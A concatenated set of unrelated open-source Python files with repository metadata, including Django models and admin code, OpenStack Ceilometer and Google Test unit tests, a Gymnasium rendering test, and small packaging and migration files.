list_display = ('name', 'label')
admin.site.register(Notification, NotificationAdmin)
admin.site.register(NotificationPreference, NotificationPreferenceAdmin)
admin.site.register(NotificationType, NotificationTypeAdmin)
|
{
"content_hash": "a747d3d4d6fe641709ff746447639488",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 72,
"avg_line_length": 32.857142857142854,
"alnum_prop": 0.808695652173913,
"repo_name": "linkfloyd/linkfloyd",
"id": "ab112de1761cd20f70c292c6ec6da4345bea69c6",
"size": "690",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "linkfloyd/notifications/admin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "27118"
},
{
"name": "JavaScript",
"bytes": "60925"
},
{
"name": "Python",
"bytes": "234160"
}
],
"symlink_target": ""
}
|
import mock
import novaclient
from ceilometer.tests import base
from ceilometer import nova_client
class TestNovaClient(base.TestCase):
def setUp(self):
super(TestNovaClient, self).setUp()
self.nv = nova_client.Client()
self.stubs.Set(self.nv.nova_client.flavors, 'get',
self.fake_flavors_get)
self.stubs.Set(self.nv.nova_client.images, 'get', self.fake_images_get)
@staticmethod
def fake_flavors_get(*args, **kwargs):
a = mock.MagicMock()
a.id = args[0]
if a.id == 1:
a.name = 'm1.tiny'
elif a.id == 2:
a.name = 'm1.large'
else:
raise novaclient.exceptions.NotFound('foobar')
return a
@staticmethod
def fake_images_get(*args, **kwargs):
a = mock.MagicMock()
a.id = args[0]
image_details = {
1: ('ubuntu-12.04-x86', dict(kernel_id=11, ramdisk_id=21)),
2: ('centos-5.4-x64', dict(kernel_id=12, ramdisk_id=22)),
3: ('rhel-6-x64', None),
4: ('rhel-6-x64', dict()),
5: ('rhel-6-x64', dict(kernel_id=11)),
6: ('rhel-6-x64', dict(ramdisk_id=21))
}
if a.id in image_details:
a.name = image_details[a.id][0]
a.metadata = image_details[a.id][1]
else:
raise novaclient.exceptions.NotFound('foobar')
return a
@staticmethod
def fake_flavors_list():
a = mock.MagicMock()
a.id = 1
a.name = 'm1.tiny'
b = mock.MagicMock()
b.id = 2
b.name = 'm1.large'
return [a, b]
@staticmethod
def fake_servers_list(*args, **kwargs):
a = mock.MagicMock()
a.id = 42
a.flavor = {'id': 1}
a.image = {'id': 1}
return [a]
def test_instance_get_all_by_host(self):
self.stubs.Set(self.nv.nova_client.servers, 'list',
self.fake_servers_list)
instances = self.nv.instance_get_all_by_host('foobar')
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0].flavor['name'], 'm1.tiny')
self.assertEqual(instances[0].image['name'], 'ubuntu-12.04-x86')
self.assertEqual(instances[0].kernel_id, 11)
self.assertEqual(instances[0].ramdisk_id, 21)
@staticmethod
def fake_servers_list_unknown_flavor(*args, **kwargs):
a = mock.MagicMock()
a.id = 42
a.flavor = {'id': 666}
a.image = {'id': 1}
return [a]
def test_instance_get_all_by_host_unknown_flavor(self):
self.stubs.Set(self.nv.nova_client.servers, 'list',
self.fake_servers_list_unknown_flavor)
instances = self.nv.instance_get_all_by_host('foobar')
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0].flavor['name'], 'unknown-id-666')
@staticmethod
def fake_servers_list_unknown_image(*args, **kwargs):
a = mock.MagicMock()
a.id = 42
a.flavor = {'id': 1}
a.image = {'id': 666}
return [a]
@staticmethod
def fake_servers_list_image_missing_metadata(*args, **kwargs):
a = mock.MagicMock()
a.id = 42
a.flavor = {'id': 1}
a.image = {'id': args[0]}
return [a]
@staticmethod
def fake_instance_image_missing(*args, **kwargs):
a = mock.MagicMock()
a.id = 42
a.flavor = {'id': 666}
a.image = None
return [a]
def test_instance_get_all_by_host_unknown_image(self):
self.stubs.Set(self.nv.nova_client.servers, 'list',
self.fake_servers_list_unknown_image)
instances = self.nv.instance_get_all_by_host('foobar')
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0].image['name'], 'unknown-id-666')
def test_with_flavor_and_image(self):
results = self.nv._with_flavor_and_image(self.fake_servers_list())
instance = results[0]
self.assertEqual(instance.image['name'], 'ubuntu-12.04-x86')
self.assertEqual(instance.flavor['name'], 'm1.tiny')
self.assertEqual(instance.kernel_id, 11)
self.assertEqual(instance.ramdisk_id, 21)
def test_with_flavor_and_image_unknown_image(self):
instances = self.fake_servers_list_unknown_image()
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertEqual(instance.image['name'], 'unknown-id-666')
self.assertNotEqual(instance.flavor['name'], 'unknown-id-666')
self.assertIsNone(instance.kernel_id)
self.assertIsNone(instance.ramdisk_id)
def test_with_flavor_and_image_unknown_flavor(self):
instances = self.fake_servers_list_unknown_flavor()
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertEqual(instance.flavor['name'], 'unknown-id-666')
self.assertEqual(instance.flavor['vcpus'], 0)
self.assertEqual(instance.flavor['ram'], 0)
self.assertEqual(instance.flavor['disk'], 0)
self.assertNotEqual(instance.image['name'], 'unknown-id-666')
self.assertEqual(instance.kernel_id, 11)
self.assertEqual(instance.ramdisk_id, 21)
def test_with_flavor_and_image_none_metadata(self):
instances = self.fake_servers_list_image_missing_metadata(3)
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertIsNone(instance.kernel_id)
self.assertIsNone(instance.ramdisk_id)
def test_with_flavor_and_image_missing_metadata(self):
instances = self.fake_servers_list_image_missing_metadata(4)
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertIsNone(instance.kernel_id)
self.assertIsNone(instance.ramdisk_id)
def test_with_flavor_and_image_missing_ramdisk(self):
instances = self.fake_servers_list_image_missing_metadata(5)
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertEqual(instance.kernel_id, 11)
self.assertIsNone(instance.ramdisk_id)
def test_with_flavor_and_image_missing_kernel(self):
instances = self.fake_servers_list_image_missing_metadata(6)
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertIsNone(instance.kernel_id)
self.assertEqual(instance.ramdisk_id, 21)
def test_with_missing_image_instance(self):
instances = self.fake_instance_image_missing()
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertIsNone(instance.kernel_id)
self.assertIsNone(instance.image)
self.assertIsNone(instance.ramdisk_id)
|
{
"content_hash": "b4711a5cb725ed8dab0c56e4929e497f",
"timestamp": "",
"source": "github",
"line_count": 190,
"max_line_length": 79,
"avg_line_length": 36.15263157894737,
"alnum_prop": 0.6040180521182122,
"repo_name": "JioCloud/ceilometer",
"id": "a51c0c36eb093f877b27ed1ec603a9a18349e757",
"size": "7568",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_novaclient.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "6284"
},
{
"name": "JavaScript",
"bytes": "64962"
},
{
"name": "Python",
"bytes": "1805677"
},
{
"name": "Shell",
"bytes": "1322"
}
],
"symlink_target": ""
}
|
"""Unit test for Google Test's global test environment behavior.
A user can specify a global test environment via
testing::AddGlobalTestEnvironment. Failures in the global environment should
result in all unit tests being skipped.
This script tests such functionality by invoking
googletest-global-environment-unittest_ (a program written with Google Test).
"""
import re
from googletest.test import gtest_test_utils
def RunAndReturnOutput(args=None):
"""Runs the test program and returns its output."""
return gtest_test_utils.Subprocess([
gtest_test_utils.GetTestExecutablePath(
'googletest-global-environment-unittest_')
] + (args or [])).output
class GTestGlobalEnvironmentUnitTest(gtest_test_utils.TestCase):
"""Tests global test environment failures."""
def testEnvironmentSetUpFails(self):
"""Tests the behavior of not specifying the fail_fast."""
# Run the test.
txt = RunAndReturnOutput()
# We should see the text of the global environment setup error.
self.assertIn('Canned environment setup error', txt)
# Our test should have been skipped due to the error, and not treated as a
# pass.
self.assertIn('[ SKIPPED ] 1 test', txt)
self.assertIn('[ PASSED ] 0 tests', txt)
# The test case shouldn't have been run.
self.assertNotIn('Unexpected call', txt)
def testEnvironmentSetUpAndTornDownForEachRepeat(self):
"""Tests the behavior of test environments and gtest_repeat."""
# When --gtest_recreate_environments_when_repeating is true, the global test
# environment should be set up and torn down for each iteration.
txt = RunAndReturnOutput([
'--gtest_repeat=2',
'--gtest_recreate_environments_when_repeating=true',
])
expected_pattern = ('(.|\n)*'
r'Repeating all tests \(iteration 1\)'
'(.|\n)*'
'Global test environment set-up.'
'(.|\n)*'
'SomeTest.DoesFoo'
'(.|\n)*'
'Global test environment tear-down'
'(.|\n)*'
r'Repeating all tests \(iteration 2\)'
'(.|\n)*'
'Global test environment set-up.'
'(.|\n)*'
'SomeTest.DoesFoo'
'(.|\n)*'
'Global test environment tear-down'
'(.|\n)*')
self.assertRegex(txt, expected_pattern)
def testEnvironmentSetUpAndTornDownOnce(self):
"""Tests environment and --gtest_recreate_environments_when_repeating."""
# By default the environment should only be set up and torn down once, at
# the start and end of the test respectively.
txt = RunAndReturnOutput([
'--gtest_repeat=2',
])
expected_pattern = ('(.|\n)*'
r'Repeating all tests \(iteration 1\)'
'(.|\n)*'
'Global test environment set-up.'
'(.|\n)*'
'SomeTest.DoesFoo'
'(.|\n)*'
r'Repeating all tests \(iteration 2\)'
'(.|\n)*'
'SomeTest.DoesFoo'
'(.|\n)*'
'Global test environment tear-down'
'(.|\n)*')
self.assertRegex(txt, expected_pattern)
self.assertEqual(len(re.findall('Global test environment set-up', txt)), 1)
self.assertEqual(
len(re.findall('Global test environment tear-down', txt)), 1)
if __name__ == '__main__':
gtest_test_utils.Main()
|
{
"content_hash": "c77c9302b8e4179ca908f45cbc4e4ac3",
"timestamp": "",
"source": "github",
"line_count": 103,
"max_line_length": 80,
"avg_line_length": 36.09708737864078,
"alnum_prop": 0.5618612157073696,
"repo_name": "JasonRuonanWang/ADIOS2",
"id": "265793442f97758b28fb2732cced44575a185fd0",
"size": "5243",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "thirdparty/GTest/googletest/googletest/test/googletest-global-environment-unittest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "803179"
},
{
"name": "C++",
"bytes": "6277414"
},
{
"name": "CMake",
"bytes": "743595"
},
{
"name": "Cuda",
"bytes": "2207"
},
{
"name": "Dockerfile",
"bytes": "38819"
},
{
"name": "Fortran",
"bytes": "625959"
},
{
"name": "MATLAB",
"bytes": "26685"
},
{
"name": "Makefile",
"bytes": "8099"
},
{
"name": "PowerShell",
"bytes": "8948"
},
{
"name": "Python",
"bytes": "224252"
},
{
"name": "Roff",
"bytes": "1214"
},
{
"name": "Shell",
"bytes": "90517"
},
{
"name": "Tcl",
"bytes": "423"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
class TimeStampedModel(models.Model):
created_at = models.DateTimeField(_("Created at"), auto_now_add=True)
modified_at = models.DateTimeField(_("Modified at"), auto_now=True)
class Meta:
abstract = True
class AuthorTimeStampedModel(models.Model):
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Created by"),
null=True, blank=True, on_delete=models.SET_NULL, editable=False, related_name="+")
created_at = models.DateTimeField(_("Created at"), auto_now_add=True)
modified_at = models.DateTimeField(_("Modified at"), auto_now=True)
class Meta:
abstract = True
def get_or_none(qs, *args, **kwargs):
try:
return qs.get(*args, **kwargs)
except models.ObjectDoesNotExist:
return None
|
{
"content_hash": "60f4a5d44fe0e39a0cf729e9e4373aca",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 107,
"avg_line_length": 30.90625,
"alnum_prop": 0.6663296258847321,
"repo_name": "nigma/djutil",
"id": "005bd96ca141c7e0e4bd4a4d87c878c12b95bb6a",
"size": "1013",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12523"
}
],
"symlink_target": ""
}
|
""" Defines a training options class as a holder for options that can be passed
for training a neural network.
"""
__author__ = "Mihaela Rosca"
__contact__ = "mihaela.c.rosca@gmail.com"
import numpy as np
# TODO: move from common here
import common
class TrainingOptions(object):
def __init__(self, miniBatchSize,
learningRate,
momentumMax=0.0,
rmsprop=False,
weightDecayL1=0.0,
weightDecayL2=0.0,
nesterovMomentum=False,
save_best_weights=False,
momentumForEpochFunction=common.getMomentumForEpochLinearIncrease,
momentumFactorForLearningRate=False):
self.miniBatchSize = miniBatchSize
self.learningRate = learningRate
self.momentumMax = np.float32(momentumMax)
self.rmsprop = rmsprop
self.weightDecayL1 = weightDecayL1
self.weightDecayL2 = weightDecayL2
self.nesterov = nesterovMomentum
self.momentumFactorForLearningRate = momentumFactorForLearningRate
self.momentumForEpochFunction = momentumForEpochFunction
self.batchLearningRate = np.float32(learningRate / miniBatchSize)
self.save_best_weights = save_best_weights
|
{
"content_hash": "e9d3f702861c136b2e18dd0469688574",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 79,
"avg_line_length": 33.64705882352941,
"alnum_prop": 0.7333916083916084,
"repo_name": "mihaelacr/pydeeplearn",
"id": "b8a1c090d4894baafb920a153b266b562688f753",
"size": "1144",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/lib/trainingoptions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "OpenEdge ABL",
"bytes": "71237705"
},
{
"name": "PureBasic",
"bytes": "1324"
},
{
"name": "Python",
"bytes": "378279"
}
],
"symlink_target": ""
}
|
import logging
from django.core.management.base import BaseCommand, CommandError
import httplib2
from for_sale.models import ImageItemURLQueue
class Command(BaseCommand):
args = '<poll_id poll_id ...>'
help = 'Closes the specified poll for voting'
def handle(self, *args, **options):
for queued_image in ImageItemURLQueue.objects.all():
try:
queued_image.get_image()
except httplib2.HttpLib2Error:
logging.exception("Error fetching import image %d" % queued_image.id)
except:
logging.exception("Error fetching import images")
raise
|
{
"content_hash": "87062b15e6eb8fb5eceea8cd2cc111c9",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 85,
"avg_line_length": 27.24,
"alnum_prop": 0.6167400881057269,
"repo_name": "codepython/CollectorCity-Market-Place",
"id": "7157a8e065ee816947324b67ebf0a1eeb1297f7a",
"size": "681",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "stores/apps/for_sale/management/commands/cron_fetch_import_images.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "863646"
},
{
"name": "HTML",
"bytes": "475154"
},
{
"name": "JavaScript",
"bytes": "693720"
},
{
"name": "Python",
"bytes": "1860719"
},
{
"name": "Shell",
"bytes": "1174"
}
],
"symlink_target": ""
}
|
import re
def read_promer_coords(coords_file):
""" Parse promer coords file.
Keyword arguments:
coords_file -- Path to promer output coords file (string, required)
returns:
A list of dictionaries with the keys:
label -- An integer, in ascending order of when they are encountered.
psim -- % similarity of the alignment (based on the scoring matrix
that you used in promer).
pid -- % AA identity in the alignment.
pstp -- % stop codons in the alignment
reference -- A dictionary containing the seqid, start position,
end position, and strand of the alignment for the reference
sequence provided to promer.
query -- As with 'reference' but for the promer query sequence.
"""
start_finder = re.compile(r"=+")
line_split = re.compile(r"\s+\|\s+|\s+")
def strand_finder(string):
if int(string) < 0:
return '-'
else:
return '+'
links_promer = list()
with open(coords_file, 'rU') as coords:
started = False
for i, line in enumerate(coords):
if i == 0:
genomes = line.split()
line = line.strip()
if not started:
if start_finder.match(line) != None:
started = True
else:
comp = dict()
line = line_split.split(line)
comp['label'] = i
comp['pid'] = float(line[6]) # %identity
comp['psim'] = float(line[7]) # %similarity
comp['pstp'] = float(line[8]) # %stop codons
comp['reference'] = {
"start": int(line[0]),
"end": int(line[1]),
"strand": strand_finder(line[9]),
"seqid": line[11]
}
comp['query'] = {
"start": int(line[2]),
"end": int(line[3]),
"strand": strand_finder(line[10]),
"seqid": line[12]
}
links_promer.append(comp)
return links_promer
|
{
"content_hash": "05994d71f7d3d968642ac6478c0d5b88",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 77,
"avg_line_length": 35.32258064516129,
"alnum_prop": 0.4885844748858447,
"repo_name": "PlummerLab/2015-08-18-AvrRvi5_genomic_context",
"id": "b173293908c80e657acee6863ca6c4f52640a99a",
"size": "2190",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/read_promer_coords.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13570"
}
],
"symlink_target": ""
}
|
import os
from setuptools import setup
def read(*fname):
with open(os.path.join(os.path.dirname(__file__), *fname)) as f:
return f.read()
try:
version = read('VERSION').strip()
except FileNotFoundError:
version = '0'
setup(
name='putio.py',
description='Python client for put.io API v2',
version=version,
author=u'Cenk Altı',
author_email='cenkalti@gmail.com',
url='https://github.com/cenkalti/putio.py',
py_modules=['putiopy'],
include_package_data=True,
zip_safe=True,
platforms='any',
install_requires=['requests', 'tus.py', 'six'],
license='MIT',
classifiers=[
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'License :: OSI Approved :: MIT License',
],
)
|
{
"content_hash": "9c1801610fe63290d6cdb35b81223447",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 68,
"avg_line_length": 24.88235294117647,
"alnum_prop": 0.6111111111111112,
"repo_name": "cenkalti/putio.py",
"id": "2e9e677d3255ee9ec9c7b9066b77ccacf4ac6408",
"size": "862",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23741"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('events', '0027_auto_20160819_1231'),
]
operations = [
migrations.AddField(
model_name='datasource',
name='api_key',
field=models.CharField(blank=True, max_length=128, null=True),
),
migrations.AddField(
model_name='datasource',
name='owner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='owned_system', to='events.Organization'),
),
migrations.AlterField(
model_name='event',
name='data_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provided_event_data', to='events.DataSource'),
),
migrations.AlterField(
model_name='keyword',
name='data_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provided_keyword_data', to='events.DataSource'),
),
migrations.AlterField(
model_name='keywordset',
name='data_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provided_keywordset_data', to='events.DataSource'),
),
migrations.AlterField(
model_name='organization',
name='data_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provided_organization_data', to='events.DataSource'),
),
migrations.AlterField(
model_name='place',
name='data_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provided_place_data', to='events.DataSource'),
),
]
|
{
"content_hash": "18f049d397c39caab1585cbeaadfbb26",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 159,
"avg_line_length": 40.16326530612245,
"alnum_prop": 0.6204268292682927,
"repo_name": "aapris/linkedevents",
"id": "a1564610e325bc5d924785495d4e2f20a870e708",
"size": "2040",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "events/migrations/0028_add_api_keys_for_external_data_sources.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "4464"
},
{
"name": "Python",
"bytes": "415096"
},
{
"name": "Shell",
"bytes": "2177"
}
],
"symlink_target": ""
}
|
"""
This module contains various unit tests for
example_gcp_dlp DAG
"""
from tests.providers.google.cloud.utils.gcp_authenticator import GCP_DLP_KEY
from tests.test_utils.gcp_system_helpers import CLOUD_DAG_FOLDER, provide_gcp_context, skip_gcp_system
from tests.test_utils.system_tests_class import SystemTest
@skip_gcp_system(GCP_DLP_KEY, require_local_executor=True)
class GcpDLPExampleDagsSystemTest(SystemTest):
@provide_gcp_context(GCP_DLP_KEY)
def test_run_example_dag_function(self):
self.run_dag('example_gcp_dlp', CLOUD_DAG_FOLDER)
|
{
"content_hash": "e6d69048113645bc3b23637d38620b11",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 102,
"avg_line_length": 37.4,
"alnum_prop": 0.7754010695187166,
"repo_name": "spektom/incubator-airflow",
"id": "54d184103023defb42c275df0af5d97cce0f7275",
"size": "1373",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/providers/google/cloud/operators/test_dlp_system.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13715"
},
{
"name": "Dockerfile",
"bytes": "17179"
},
{
"name": "HTML",
"bytes": "148492"
},
{
"name": "JavaScript",
"bytes": "25233"
},
{
"name": "Jupyter Notebook",
"bytes": "2933"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "9768581"
},
{
"name": "Shell",
"bytes": "221415"
},
{
"name": "TSQL",
"bytes": "879"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.test import TestCase
from pokemon_v2.models import *
class AbilityTestCase(TestCase):
def setUp(self):
Ability.objects.create(
name = "Smell",
generation_id = 3,
is_main_series = true
)
def fields_are_valid(self):
smell = Ability.objects.get(name="Smell")
self.assertEqual(smell.generation_id, 3)
|
{
"content_hash": "16b6354456d196ab0cea238461cb1a2c",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 45,
"avg_line_length": 24.375,
"alnum_prop": 0.6846153846153846,
"repo_name": "zaneadix/pokeapi",
"id": "c9b325b9b315b52f29fb746ce30b47a8229d6c88",
"size": "390",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pokemon_v2/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "840"
},
{
"name": "HTML",
"bytes": "48499"
},
{
"name": "Makefile",
"bytes": "340"
},
{
"name": "Python",
"bytes": "740682"
}
],
"symlink_target": ""
}
|
import re
import pytest
import gymnasium as gym
from gymnasium.wrappers import HumanRendering
def test_human_rendering():
for mode in ["rgb_array", "rgb_array_list"]:
env = HumanRendering(
gym.make("CartPole-v1", render_mode=mode, disable_env_checker=True)
)
assert env.render_mode == "human"
env.reset()
for _ in range(75):
_, _, terminated, truncated, _ = env.step(env.action_space.sample())
if terminated or truncated:
env.reset()
env.close()
env = gym.make("CartPole-v1", render_mode="human")
with pytest.raises(
AssertionError,
match=re.escape(
"Expected env.render_mode to be one of 'rgb_array' or 'rgb_array_list' but got 'human'"
),
):
HumanRendering(env)
env.close()
|
{
"content_hash": "4c4a7d302030a3888c268fff77f487d1",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 99,
"avg_line_length": 26.46875,
"alnum_prop": 0.5844155844155844,
"repo_name": "Farama-Foundation/Gymnasium",
"id": "0583eae0bb51bc969e4255a0a0ffc08ba65ee890",
"size": "847",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/wrappers/test_human_rendering.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "888"
},
{
"name": "Python",
"bytes": "1188231"
},
{
"name": "Shell",
"bytes": "484"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.